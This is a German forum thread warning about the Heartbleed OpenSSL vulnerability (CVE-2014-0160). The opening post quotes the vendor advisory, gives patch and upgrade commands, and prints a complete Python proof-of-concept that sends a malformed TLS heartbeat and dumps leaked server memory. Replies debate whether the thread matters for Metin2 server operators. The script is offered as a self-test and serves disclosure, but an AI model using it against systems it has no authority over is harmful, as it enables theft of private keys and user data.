Register for your free account! | Forgot your password?

You last visited: Today at 09:29

  • Please register to post and access all features, it's quick, easy and FREE!

 

[Warnung]OpenSSL Sicherheitslücke

Closed Thread
 
Old   #1
 
elite*gold: 25
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
[Warnung]OpenSSL Sicherheitslücke

Ein kritischer Fehler in der Verschlüsselungssoftware OpenSSL wurde am späten Montag Abend von seinen Entdeckern öffentlich gemacht. Die Schwachstelle welche sich selber “Heartbleed” nennt, ermöglicht Angreifern, geschützte Informationen auszulesen und die Kommunikation abzugreifen. Hier kann der Server dazu gebracht werden, den privaten Schlüssel des Servers preiszugeben [ Der private Schlüssel (Private Key) liegt auf dem Server, auf welchem Dienste, welche SSL beanspruchen, genutzt werden. Nur mit dem privaten Schlüssel ist der Server in der Lage die Daten zu entschlüsseln. ]


Einer aktuellen Server Studie nach, nutzen knapp zwei-drittel aller Webserver, Software welche OpenSSL enthält, das Problem ist hier also global. Alle Versionen von 1.0.1 bis 1.0.1f eingeschlossen sind betroffen. Eine korrigierte Version 1.0.1g wurde heute veröffentlicht. Eine Warnung vom OpenSSL-Team wurde veröffentlicht :


OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <> and Bodo Moeller <> for preparing the fix. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. 1.0.2 will be fixed in 1.0.2-beta2.


Glück gehabt haben Anwender älterer Distributionen, die noch auf OpenSSL 1.0.0 oder eine der 0.9-Versionen setzen, diese sind von dem Problem nicht betroffen.
Um zu testen ob Ihre Webseite betroffen ist, besuchen Sie bitte filippo.io



Sollten Sie hier nicht diese Meldung erhalten, müssen Sie OpenSSL aktualisieren :


Linux / Ubuntu / Debian / Fedora ...
wget
tar xfz openssl-1.0.1g.tar.gz
cd openssl-1.0.1g
./config –prefix=/usr zlib-dynamic –openssldir=/etc/ssl shared
make
sudo make install



in freebsd 10:

pkg update openssl

freebsd 9 or older:

portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean



hier noch ein python script zum testen:

Code:
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ()
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()



.Milo' is offline  
Thanks
3 Users
Old   #2

 
elite*gold: 0
Join Date: Nov 2010
Posts: 1,580
Received Thanks: 3,281
Those instructions are for Linux.

in freebsd 10:

pkg update openssl

freebsd 9 or older:

portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean


.Shōgun is offline  
Thanks
4 Users
Old   #3
 
elite*gold: 20
Join Date: Aug 2012
Posts: 715
Received Thanks: 1,168
99% werden hier von nicht betroffen sein.
Erst sich selbst informieren und dann kopieren

FreeBSD bis 9.2 nutzt noch OpenSSL 0.9.8 die nicht durch den Fehler betroffen sind. Ausserdem nutzt eigentlich kein Server SSL, und SSH nutzt sein eigenes.

Gruss,
Chuck
'ChuckNorris is offline  
Thanks
8 Users
Old   #4
 
elite*gold: 0
Join Date: May 2013
Posts: 1,262
Received Thanks: 617
Ist das nicht schon seit cirka ner woche bekannt ..?
trotzdem danke


[uLow]NTX?! is offline  
Old   #5
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,525
Received Thanks: 358
was macht das in der metin2 sec? denke nicht das hier wer legale ssl zertifikate hat ...
und ssl benutzen denke ich mal eh die wenigsten aber naja
.Meep is offline  
Old   #6
 
elite*gold: 337
Join Date: Feb 2008
Posts: 2,752
Received Thanks: 1,745
Würde mich mal interessieren, woher du das wieder abkopiert hast.

Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.

Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.

@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die Problematik dahinter ganz offensichtlich noch nicht verstanden.

/e: Lass es doch bitte einfach bleiben.
Computerfreek is offline  
Old   #7
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,525
Received Thanks: 358
Quote:
Originally Posted by Computerfreek View Post
Würde mich mal interessieren, woher du das wieder abkopiert hast.

Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.

Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.

@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die ganze Problematik dahinter ganz offensichtlich noch nicht verstanden.
was das problem ist schon was es auslöst nicht juckt mich aber auch nicht tls ftw?^^ naja stimmt man brauch kein legales zertifikat und es geht auch nicht um die benutzer sondern die serverzugänge also mitm ftp client oder so?!
.Meep is offline  
Old   #8
 
elite*gold: 50
Join Date: Nov 2009
Posts: 865
Received Thanks: 1,219
Quote:
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
SyntaxError: invalid syntax
ebert.tonna is offline  
Old   #9
 
elite*gold: 25
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
example : python ssltest.py -p 80
.Milo' is offline  
Old   #10
 
elite*gold: 400
Join Date: Dec 2007
Posts: 6,564
Received Thanks: 6,284
Quote:
Originally Posted by .Meep View Post
legales zertifikat
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
Mi4uric3 is offline  
Old   #11
 
elite*gold: 0
Join Date: Jan 2014
Posts: 42
Received Thanks: 18
hier könnt ihr es testen ob ihr die Lücke habt...
MrRylisma is offline  
Old   #12
 
elite*gold: 169
Join Date: Dec 2012
Posts: 2,525
Received Thanks: 358
Quote:
Originally Posted by Mi4uric3 View Post
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
Damit oben im browser steht das die n zertifikat haben
.Meep is offline  
Old   #13

 
elite*gold: 707
Join Date: Oct 2011
Posts: 7,280
Received Thanks: 7,457
Ob es fürs Kopieren auch so eine gute Anleitung dazu gab? Alle regen sich über so eine Lücke auf, nur weil Medien im Moment keine anderen Themen finden oder in Afrika einfach zu wenig los ist.
Aze /.. is offline  
Thanks
1 User
Old   #14
 
elite*gold: 3
Join Date: Apr 2012
Posts: 1,436
Received Thanks: 631
Sorry, aber was hat das mit Metin2 zu tun?

Nur weil hier viele Webseitenbetreiber sind? - Demnach poste es doch auch in den unzähligen Sektionen, wo sich auch Webseitenbetreiber aufhalten.


Regards
Anti™ is offline  
Old   #15
 
elite*gold: 0
Join Date: Apr 2014
Posts: 37
Received Thanks: 58
Die lücke ist mir zumindest schon 2 Jahre bekannt also nichts neues. Gibt mehr als nur die eine.


5up3rr is offline  
Thanks
1 User
Closed Thread



« Previous Thread | Next Thread »

Similar Threads
OpenSSL
Hey, Ich brauche diese OpenSSL Version für Windows: 1.0.1.E Wo krieg ich die her? Find die leider nicht :( Gibt es nur für Linux, die...
7 Replies - Technical Support
Problem with OpenSSL
Hello mates, I'm currently having trouble with running Arco Online's source, I wanted to go through it and check it out but sadly there's something...
2 Replies - CO2 PServer - Discussions / Questions
Openssl
Ich versuche gerade mithilfe von OpenSSL RSA in C++ zu benutzen. Ich habe es von der Homepage runtergeladen und mein Problem ist jetzt, dass ich...
5 Replies - C/C++
[SICHERHEITSLÜCKE]SSH/Metin2 Sicherheitslücke
Hey, ich will hier mal eine Sicherheitslücke in SSH die man über Metin2 erreicht releasen. Aber damit das nicht geleecht wird, habe ich es...
26 Replies - Metin2 PServer Guides & Strategies



All times are GMT +1. The time now is 09:29.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2017 elitepvpers All Rights Reserved.